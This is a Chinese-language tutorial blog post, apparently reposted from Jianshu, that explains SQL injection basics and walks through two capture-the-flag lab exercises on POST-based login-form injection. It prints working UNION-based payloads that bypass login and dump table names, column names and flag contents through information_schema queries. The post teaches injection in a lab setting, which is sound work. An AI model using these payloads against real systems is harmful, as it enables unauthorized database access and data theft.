SQL注入-POST注入

举报
xcc-2022 发表于 2023/02/24 21:50:53 2023/02/24
【摘要】 知识梳理SQL注入原理:用户输入的数据可以被拼接到原有代码执行SQL注入基本流程:(1). 判断注入点,例:数字型:id=1 and 1=1 页面正常id=1 and 1=2页面不正常;字符型:单双引号、括号闭合,观察页面是否正常;使用sleep()观察页面是否存在延迟;(2)猜解字段数,例:and 1=2 order by 1,2,3通过观察页面是否正常来确定字段数(3)查看显错点and ...

知识梳理

  1. SQL注入原理:用户输入的数据可以被拼接到原有代码执行
  2. SQL注入基本流程:
  • (1). 判断注入点,例:
    数字型:id=1 and 1=1 页面正常id=1 and 1=2页面不正常;
    字符型:单双引号、括号闭合,观察页面是否正常;
    使用sleep()观察页面是否存在延迟;
  • (2)猜解字段数,例:
    and 1=2 order by 1,2,3通过观察页面是否正常来确定字段数
  • (3)查看显错点
    and 1=2 union select 1,2,3通过发现显错位置可以知道在哪里输出想要的信息
  • (4)查询库名、表名、字段名、字段内容
    可以通过查询系统自带库information_schema来获取想要的内容。
    -查询库名
    union select 1,2,database()
    -查询表名
    union select 1,2,table_name from information_schema.tables where table_schema = database()
    -查询字段名
    union select 1,2,column_name from information_schema.columns where table_schema = database() and table_name='TABLE_NAME'
    -查询字段内容
    union select 1,column1,column2 from table_name limit 0,1
    group_concat可以将多行数据整合到一行输出
    union select 1,2,group_concat(flag) from TABLE_NAME

靶场演示

POST注入靶场一

1. 判断注入点

尝试万能密码登陆成功,判断存在POST注入



image
2. 查询字段数

'or 1=1 order by 1,2,3..#判断字段数


image



image

判断字段数为3个

3. 判断显错位置

'or 1=2 union select 1,2,3 #判断注入点(因为用户名可能存在字数现在,所以选择在密码栏中进行注入)


image


4. 查询库名

'or 1=2 union select 1,2,database() #查询库名


image
5. 查询表名

'or 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #


image


6. 查询字段名

猜测flag在flag表中
'or 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag' #


image
7. 查询字段内容

'or 1=2 union select 1,2,group_concat(flag) from flag #


image

flag为:zKaQ-PostK1


image

显错注入靶场二

第二题于第一题区别在于闭合不通这里不做过多描述直接结果截图。
")or 1=2 union select 1,2,group_concat(flag) from flag #


image

最后正确的flag是:zKaQ-XZT





作者:虚晃一枪骗过上帝
链接:https://www.jianshu.com/p/d40145175559
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。